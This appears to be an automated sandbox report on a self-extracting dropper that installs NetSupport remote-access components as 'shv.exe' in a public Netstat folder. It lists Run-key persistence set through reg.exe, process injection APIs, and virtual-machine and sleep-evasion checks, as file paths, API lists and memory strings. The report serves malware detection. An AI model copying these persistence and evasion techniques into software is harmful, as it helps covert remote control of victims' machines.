Source:	Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

6_2_11029590

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6430546

Jump to behavior

Source: file.exe	Static PE information: section name: .didat
Source: file.exe	Static PE information: section name: _RDATA
Source: PCICL32.DLL.0.dr	Static PE information: section name: .hhshare

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5156 push rsi; retf	0_2_00007FF70E7C5157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5166 push rsi; retf	0_2_00007FF70E7C5167
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116F055 push ecx; ret	6_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11169F49 push ecx; ret	6_2_11169F5C
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116F055 push ecx; ret	9_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11169F49 push ecx; ret	9_2_11169F5C

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\shv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\PCICL32.DLL	Jump to dropped file

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,

6_2_6D1D7030

Source: C:\Users\Public\Netstat\shv.exe

6_2_11127E10

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	6_2_11139090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_11113290
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11024280
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11112670 IsIconic,GetTickCount,	6_2_11112670
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	9_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	9_2_11139090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	9_2_11113290
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	9_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	9_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	9_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	9_2_11024280
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11112670 IsIconic,GetTickCount,	9_2_11112670
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	9_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	9_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	9_2_1115ADD0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_11143570

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1C91F0		6_2_6D1C91F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1D4F30		6_2_6D1D4F30

Delayed program exit found

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110B8200 Sleep,ExitProcess,		6_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110B8200 Sleep,ExitProcess,		9_2_110B8200

Source: C:\Users\Public\Netstat\shv.exe

Window / User API: threadDelayed 938

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file

Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-80262
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-82146
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-82158
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-85160
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-85559
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-85721
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision	graph_6-85737
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision

Source: C:\Users\Public\Netstat\shv.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Netstat\shv.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_6-85299

Source: C:\Users\Public\Netstat\shv.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_6-80803

Source: C:\Users\Public\Netstat\shv.exe	API coverage: 6.2 %
Source: C:\Users\Public\Netstat\shv.exe	API coverage: 2.6 %

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D4F30

6_2_6D1D4F30

Source: C:\Users\Public\Netstat\shv.exe TID: 1012

Thread sleep time: -93800s >= -30000s

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Netstat\shv.exe	Last function: Thread delayed

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6D1D3226h

6_2_6D1D3130

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,	0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	9_2_1110AFD0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B16A4 VirtualQuery,GetSystemInfo,

0_2_00007FF70E7B16A4

Source: shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla m*
Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: shv.exe, 00000006.00000002.3994135214.000000000127E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995636739.0000000005F06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.0.dr	Binary or memory string: VMWare
Source: shv.exe, 00000009.00000002.2162978734.0000000001490000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000009.00000003.2162115523.000000000148D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
